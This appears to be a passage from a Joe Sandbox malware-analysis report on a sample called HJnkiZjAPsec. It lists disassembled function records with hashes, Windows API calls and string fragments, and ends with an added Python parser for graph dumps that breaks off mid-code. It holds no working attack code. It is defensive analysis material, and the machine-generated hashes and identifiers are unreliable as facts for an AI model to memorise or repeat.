                                                                                                        • Opcode Fuzzy Hash: 76df3b1578658649db25fcf2e43fed193e5bc243b7a7cb3a75fee180a5180d2b
                                                                                                        • Instruction Fuzzy Hash: 961112B5C006599BCB14CF9AD884A9EFBF8FB48320F10812AE819B7340D774A944CFA5
                                                                                                        APIs
                                                                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 085AC6A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DebugOutputString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1166629820-0
                                                                                                        • Opcode ID: 0a7ae7bacf3442b7384bb34980c4da4b575759dc9e2b7f8f814c9f38ec11e446
                                                                                                        • Instruction ID: 2525e93f4e64ff66a286c93b0f35f2cf5b8f80158a697c370eddd1c928c7e29e
                                                                                                        • Opcode Fuzzy Hash: 0a7ae7bacf3442b7384bb34980c4da4b575759dc9e2b7f8f814c9f38ec11e446
                                                                                                        • Instruction Fuzzy Hash: 421126B5C006599FCB14CF9AD484ADEFBF4FB48320F20811AD819B7250C774A944CFA5
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0129E27E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1778431812.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_1290000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: 302ef3981da3d034f6f71de0a3f2fab3bd4e6cc8d60fd6000eb0cf99c1fe96ab
                                                                                                        • Instruction ID: 83a386cb1c0726fe8b0347564e6a7b9bfee16273b0e2433ffcc53096144905a4
                                                                                                        • Opcode Fuzzy Hash: 302ef3981da3d034f6f71de0a3f2fab3bd4e6cc8d60fd6000eb0cf99c1fe96ab
                                                                                                        • Instruction Fuzzy Hash: C11110B5C00349CFDB14CF9AC844ADEFBF4EB88324F10846AD928A7210C379A545CFA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (bq
                                                                                                        • API String ID: 0-149360118
                                                                                                        • Opcode ID: 942a692e5fae3e381d0db5c57751fe588689598b18bfb4e228b70a7f1cb1247c
                                                                                                        • Instruction ID: 7b8c1afff1d560f68a11f3664c5f4b07f8fd2f4db36b3e2351412a0deb99aa5d
                                                                                                        • Opcode Fuzzy Hash: 942a692e5fae3e381d0db5c57751fe588689598b18bfb4e228b70a7f1cb1247c
                                                                                                        • Instruction Fuzzy Hash: 95910275A15219EFCB18DFA9D8486AEBFF6FF88300F14846AE446A7790DB349841CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @
                                                                                                        • API String ID: 0-2766056989
                                                                                                        • Opcode ID: 34d8f0cea1ed563dc0efe8a70a5cca1d77d3ee73022fb61a0baac3263a85acee
                                                                                                        • Instruction ID: 0d930ac967bbaee67039c1b250d350e307ec80fc071c1bf34f835aff6eb2186b
                                                                                                        • Opcode Fuzzy Hash: 34d8f0cea1ed563dc0efe8a70a5cca1d77d3ee73022fb61a0baac3263a85acee
                                                                                                        • Instruction Fuzzy Hash: CCD14D3591021ACFCF05CFA8C5949EDF7B1FF48314B258659D8067B259EB70AA8ACF80
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 7ba618357d32f2b039699c49d01ae0b7eb3e72161ffb2e49cd654f5fc411f023
                                                                                                        • Instruction ID: 73fd6c3c601eeab314436a84df7b9210094234ced2428d970cc73bbed4cff512
                                                                                                        • Opcode Fuzzy Hash: 7ba618357d32f2b039699c49d01ae0b7eb3e72161ffb2e49cd654f5fc411f023
                                                                                                        • Instruction Fuzzy Hash: A6A1FE3591021ACFCF05DFA8C9948DDB7B5FF58314B218655D8066B259EB70B98ACF80
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hbq
                                                                                                        • API String ID: 0-1245868
                                                                                                        • Opcode ID: eb349f32561da2a07a1180567f1fcb735f9fb842193d0ab9b756593bc0cbec85
                                                                                                        • Instruction ID: 28abedca7c358eb036f2f5473413462530d835239fcd28ef833baf0c4c78af82
                                                                                                        • Opcode Fuzzy Hash: eb349f32561da2a07a1180567f1fcb735f9fb842193d0ab9b756593bc0cbec85
                                                                                                        • Instruction Fuzzy Hash: CE4170B5A00318DFCB14DFA9C484AAEBBF5FF88310F108429E449E7750DB75A945CBA1
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 085AC747
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        • Opcode ID: 4e4e9bec638be6766fc67c0b9a6559876d6a450ae35135eb9b01db350ac1a0d6
                                                                                                        • Instruction ID: 3a48c0f51d74e51b63e97a8aa948b63076ef6cc932d81554f50376b9a7f0d6dd
                                                                                                        • Opcode Fuzzy Hash: 4e4e9bec638be6766fc67c0b9a6559876d6a450ae35135eb9b01db350ac1a0d6
                                                                                                        • Instruction Fuzzy Hash: 8C115BB5800249CFCB10CF9AD4857DEBBF4EF49320F20846AD554A7251C378A944CFA5
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 085AC747
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        • Opcode ID: a36730f8e3fb812197d070cfecbdf594ddd47cd0df04c426e0a629dc96e933b2
                                                                                                        • Instruction ID: f9bfba1af83ae7f8c70f15136d3a090b0e15d7ecaa3b0966d8d98c29469d7f51
                                                                                                        • Opcode Fuzzy Hash: a36730f8e3fb812197d070cfecbdf594ddd47cd0df04c426e0a629dc96e933b2
                                                                                                        • Instruction Fuzzy Hash: 5F113AB1800249CFDB10DF9AC584BDEFBF8FB48320F10846AD558A7251D778A944CFA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >
                                                                                                        • API String ID: 0-325317158
                                                                                                        • Opcode ID: 468f75be58fd20cd81780bf56c1b70e5fc795a5ef054d4d3a925888e7ca638c3
                                                                                                        • Instruction ID: b964c353ee0b3348ab45d79aae25af756203c03d8c5e565c32228ba62332c6a4
                                                                                                        • Opcode Fuzzy Hash: 468f75be58fd20cd81780bf56c1b70e5fc795a5ef054d4d3a925888e7ca638c3
                                                                                                        • Instruction Fuzzy Hash: E8112EB9900258CFCB20DF99C588BDEFBF4AF48324F20841AD459A7650D378A984CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: acf986f2a38c7cce739e9f7f0c376faf7322aaedc497144eed7b082db49f8d6a
                                                                                                        • Instruction ID: 95debcc760c718d0f9a29b87bacc5462844eb167cceedfae5ed550e169bf7923
                                                                                                        • Opcode Fuzzy Hash: acf986f2a38c7cce739e9f7f0c376faf7322aaedc497144eed7b082db49f8d6a
                                                                                                        • Instruction Fuzzy Hash: 6A42FA35E2062ADBCB14DF68C8846EDF7B1BF49304F1086A9D459BB211EB70AE85CF40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3b5a1a24eb5edb7539b34e854731073cac2742e9a056b7618ae2e33364463ba3
                                                                                                        • Instruction ID: ae85549ec1eeda92bb4e200f92ff123fda0db9ebe7b510e306b156b81bb0de51
                                                                                                        • Opcode Fuzzy Hash: 3b5a1a24eb5edb7539b34e854731073cac2742e9a056b7618ae2e33364463ba3
                                                                                                        • Instruction Fuzzy Hash: B7F10C35E206299FCB25DF68C8846EDB7B2FF49300F1086A9D459BB251EB70AD85CF40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fb1a9b315eb00c0d6ff133a959a02157c769dffea4bb188bf27900aca0b8cf5a
                                                                                                        • Instruction ID: 07f10010b774317d04f432518a6ff4565b348d8e1758fa76ed0d7e2406f8e6f0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7c1da2429fc285b97df257e7cbd5acfd3ea140941ed3b72ffd1c0fbb67efb11e
                                                                                                        • Instruction ID: 26b32011ed05d585f51359a03ede56135c589a941c4fa1656af0e1dc53d1ded2
                                                                                                        • Opcode Fuzzy Hash: 7c1da2429fc285b97df257e7cbd5acfd3ea140941ed3b72ffd1c0fbb67efb11e
                                                                                                        • Instruction Fuzzy Hash: 7001F93A32453057CB19A628C86877D3397AFD6651F48403DE10ACF390DF28C842C791
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 18cb6e7822b5231ff6ee2ddb79512cd0a543b894380795c3e066331096318258
                                                                                                        • Instruction ID: 8dd1947c4b2e91a0fa65a57f0bfe06f4cb0ad2bf0f39362bdb59a963a702225c
                                                                                                        • Opcode Fuzzy Hash: 18cb6e7822b5231ff6ee2ddb79512cd0a543b894380795c3e066331096318258
                                                                                                        • Instruction Fuzzy Hash: A9114E3A6187509FC716AB74C8151EE7B71EFC2110F0546AEC4896B241EF349942CBD2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 95da72620161357ab39df7e572415346b47820553504387df7743b6c183443c4
                                                                                                        • Instruction ID: ee17edafc234babec93081d2c3ff55f526bfed23efb21ad55955203696131029
                                                                                                        • Opcode Fuzzy Hash: 95da72620161357ab39df7e572415346b47820553504387df7743b6c183443c4
                                                                                                        • Instruction Fuzzy Hash: 5F11F5B5900259DFCB20DF99C444B9EFBF4EB48320F108459D559A7750D374A944CFA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7ae3727b503405ffad096185272a6b6445b1f665c5e61e0f9ce6480a90c0ebb1
                                                                                                        • Instruction ID: 699c67217462e2413787532416df4e9ebb41a91ab0408798ccb05e9620a02fbf
                                                                                                        • Opcode Fuzzy Hash: 7ae3727b503405ffad096185272a6b6445b1f665c5e61e0f9ce6480a90c0ebb1
                                                                                                        • Instruction Fuzzy Hash: EB014035A10715EFC724EF75C44456AB7B6BF85300B50CA6ED4465B660EF31E942CF81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 51f1df90adf8ffa537f8d769f836484e3e0a72d070702c5f843069eb198997cb
                                                                                                        • Instruction ID: 7a98e17351f5f95080bc8245e7e0abb278e8d8715e268775be61ea3488072026
                                                                                                        • Opcode Fuzzy Hash: 51f1df90adf8ffa537f8d769f836484e3e0a72d070702c5f843069eb198997cb
                                                                                                        • Instruction Fuzzy Hash: 69F0F63933093167CB196628842876E73DAEFD6611F48402CD50ACB3A1DF64C802C695
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4e2dab290250c637d5588136755c5d4df24b0e7287d06d7a3e4c8f706d885648
                                                                                                        • Instruction ID: 7992aa0325f79277a17a7523868c8903448999b037f60aa13361377749509576
                                                                                                        • Opcode Fuzzy Hash: 4e2dab290250c637d5588136755c5d4df24b0e7287d06d7a3e4c8f706d885648
                                                                                                        • Instruction Fuzzy Hash: F9F0E93933D1326BCB249A2A8898E7E73EBAFC4A11744442AB407C7665DFA4DC01CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 612fc748785e49f6c8f80cb2ffea34e9e49e081d75a7e871392d23411d4ef20f
                                                                                                        • Instruction ID: cef8f489ca2b36b4b950f34d6f2cbc8eded35b76454e6fc93cead4cd239efe58
                                                                                                        • Opcode Fuzzy Hash: 612fc748785e49f6c8f80cb2ffea34e9e49e081d75a7e871392d23411d4ef20f
                                                                                                        • Instruction Fuzzy Hash: 2F01D435A14714AFC315EF75C54456A77B2BF81300B10CA6ED4469B3A0EB34D886CF81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 26ca0d12c2cbd520939739041e9bdadc5b255410e9aa613222ba3597b4100256
                                                                                                        • Instruction ID: ade93523ad39b4fde425b3fadc5bed641fa61ccb1a892b257f0fc38abe60a549
                                                                                                        • Opcode Fuzzy Hash: 26ca0d12c2cbd520939739041e9bdadc5b255410e9aa613222ba3597b4100256
                                                                                                        • Instruction Fuzzy Hash: CDF0C8322106118FC7249F1DE984B6AF7B6FFC4315B500269E40A87350DB30EC028794
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 84115bb65ca9425006b15828c57463acc0a7e1d8336d350bf6cdbe94dddc1bd1
                                                                                                        • Instruction ID: 35730da78ee2a449bd23f37afe72bd14005a4380ca86368573095c99331596ea
                                                                                                        • Opcode Fuzzy Hash: 84115bb65ca9425006b15828c57463acc0a7e1d8336d350bf6cdbe94dddc1bd1
                                                                                                        • Instruction Fuzzy Hash: 66014F322046608FC705DB2CD959A857BF1AF46709B1945E9D04ACF772DB61EC84CB40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f1bcae5e832d5b374b51db51d1a95ffbc255c1d1e05b4978076e7fc8a92e7792
                                                                                                        • Instruction ID: d70e2d46c3f8ae8f65f7be11b2a267d201ae8d2c90c9986f2eea1b017904c336
                                                                                                        • Opcode Fuzzy Hash: f1bcae5e832d5b374b51db51d1a95ffbc255c1d1e05b4978076e7fc8a92e7792
                                                                                                        • Instruction Fuzzy Hash: 41F0E9323506155FC6209F69DCD4A5FBBE9EFC42257000938E00ACF3A0CE61DC464790
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: df9dfe25d1062a0aa428490a8e4aae7802f24c6de2eafa93225246f85faa2267
                                                                                                        • Instruction ID: d45b8e39b5e31f60df0159e5f14c357f10230aee2659cfabd1584c2f2375749b
                                                                                                        • Opcode Fuzzy Hash: df9dfe25d1062a0aa428490a8e4aae7802f24c6de2eafa93225246f85faa2267
                                                                                                        • Instruction Fuzzy Hash: ACF05E763106154F86259F6AE88485ABBEAEFD42253004A7AE10ECB260CE71ED4A8790
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 585f588635d4ec2111f965ff813853df1704e5792c588293ac43cd994bc86894
                                                                                                        • Instruction ID: 2ca529c88ebcba653353d0423b0520c44a4aa9791f21fdc9ba0aed4724aa53e8
                                                                                                        • Opcode Fuzzy Hash: 585f588635d4ec2111f965ff813853df1704e5792c588293ac43cd994bc86894
                                                                                                        • Instruction Fuzzy Hash: 12F0F6751097906FC7364B249910AA37FF8EF4661030589AFD8C9C7A56D234E845C761
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 98901a4e9cba5f51eccd4ad81d3443ccd3842428af68c94071a0af37fdb537e1
                                                                                                        • Instruction ID: b63317558592f9f94dec6f941cf0a014a815a2a59e950b462d11cae6c707a124
                                                                                                        • Opcode Fuzzy Hash: 98901a4e9cba5f51eccd4ad81d3443ccd3842428af68c94071a0af37fdb537e1
                                                                                                        • Instruction Fuzzy Hash: A3F0C23AB20B14ABCB157A78C4044AEB776EFC1610F01466ED84967200EF30A982CAD2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ab825bf9bc5436cbbfde64ca6eeedb297e26e96c31fd27eb610ce5f4f4fabe78
                                                                                                        • Instruction ID: b5168dec0ba541c4321465c4c73671b4d2f4e9fe933105ad91a9919de6338e90
                                                                                                        • Opcode Fuzzy Hash: ab825bf9bc5436cbbfde64ca6eeedb297e26e96c31fd27eb610ce5f4f4fabe78
                                                                                                        • Instruction Fuzzy Hash: 69F0E93D33D2729BD7248A299854B7D37A6AFC0912B09406EF407CB692DB64D802CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0a301f27bc581df4d4746c37a269122f7963f8b8c9aff5c29a1a20171dfff14f
                                                                                                        • Instruction ID: 922fb1cdab3d5155b8ee109789ddeb7bf2c41e026a01e9437953882f71dd9854
                                                                                                        • Opcode Fuzzy Hash: 0a301f27bc581df4d4746c37a269122f7963f8b8c9aff5c29a1a20171dfff14f
                                                                                                        • Instruction Fuzzy Hash: 62F08239324930A7CB196639902863D73DBAFD6A11B54402DE50ACF7A1CF64CC42C795
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3ce29a3665e5256b629ec490de319377e7f371b5ee6bee049808c67e34ab26c3
                                                                                                        • Instruction ID: 205fa1043576f4a38075a9738b05b0856edeb73b92a54b6c37004487831d0a0a
                                                                                                        • Opcode Fuzzy Hash: 3ce29a3665e5256b629ec490de319377e7f371b5ee6bee049808c67e34ab26c3
                                                                                                        • Instruction Fuzzy Hash: 8901C475A00609DFCB40EFB8C5859EEBFF0FF49204B11869BE459E7221E7709A58CB81

Execution Graph

Execution Coverage: 19.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 47
Total number of Limit Nodes: 12

Control-flow Graph

• Executed
• Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q$PH^q$PH^q
                                                                                                        • API String ID: 0-1018772655
                                                                                                        • Opcode ID: d2331ae88f50dd2519dfef646a2aeb18986feb5fbc4f1b87c629bb1eece2c71b
                                                                                                        • Instruction ID: 082317ef93f2a8a40158755c7012444fbdceadf91f0d94c37513cc03724a7b11
                                                                                                        • Opcode Fuzzy Hash: d2331ae88f50dd2519dfef646a2aeb18986feb5fbc4f1b87c629bb1eece2c71b
                                                                                                        • Instruction Fuzzy Hash: 23A1D574E00219CFDF19DFA9D944AADBBF2BF88304F10906AE45AAB365DB309941CF50
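The control_flow_graph and execution_graph data the Joe Sandbox IDA plugin emits for each function is a flat token stream (node id, address or address-range, optional `call <hex>` pairs or API-name annotations, `A->B` edges) that is meant for the report's graph viewer, not for reading. The parser below is an added example written for this page, not Joe Sandbox code; the grammar it implements is inferred from the dumps on this page rather than taken from a published specification, and the two sample inputs are excerpts copied from this report (the first shortened to the blocks that carry calls). It turns a dump into block ranges, edges, resolved call targets and API names, which is what you want when deciding whether the repeated functions in this dump are the same stub.

```python
# Added example for this report page; not Joe Sandbox code. Parses the
# control_flow_graph / execution_graph data emitted per function by the Joe
# Sandbox IDA plugin. The token grammar (node id, address or address-range,
# optional 'call <hex>' pairs or API-name annotations, 'A->B' edges) is
# inferred from the dumps on this page, not from a published specification.
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Excerpt of the control_flow_graph data for the function rooted at 29ec468,
# copied from this page and shortened to the blocks that carry calls.
SAMPLE_CFG = (
    "control_flow_graph 146 29ec468-29ec471 147 29ec415 148 29ec473-29ec498 "
    "146->147 146->148 149 29ec49f-29ec57c call 29e41a0 call 29e3cc0 "
    "148->149 150 29ec49a 148->150 182 29ec57e 149->182 "
    "183 29ec583-29ec5a4 call 29e5658 149->183 150->149 182->183"
)

# Excerpt of the execution_graph data from this page, which annotates blocks
# with resolved API names and '<n> API calls' summaries instead of targets.
SAMPLE_EXEC = (
    "execution_graph 19660 696992c 19664 69697e3 19660->19664 "
    "19661 6969924 LdrInitializeThunk 19663 6969a81 19661->19663 "
    "19664->19661 19665 6969328 2 API calls 19664->19665 19665->19664"
)

ADDR_RE = re.compile(r"^[0-9a-f]{6,8}(-[0-9a-f]{6,8})?$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
API_RE = re.compile(r"^[A-Z][A-Za-z0-9_]+$")  # e.g. LdrInitializeThunk


@dataclass
class Block:
    node_id: int
    start: int
    end: int | None  # None when the dump lists a single address
    calls: list[int] = field(default_factory=list)
    apis: list[str] = field(default_factory=list)
    notes: list[str] = field(default_factory=list)  # e.g. ['2', 'API', 'calls']


@dataclass
class Graph:
    kind: str  # 'control_flow_graph' or 'execution_graph'
    blocks: dict[int, Block]
    edges: list[tuple[int, int]]


def parse_graph(text: str) -> Graph:
    tokens = text.split()
    kind, tokens = tokens[0], tokens[1:]
    blocks: dict[int, Block] = {}
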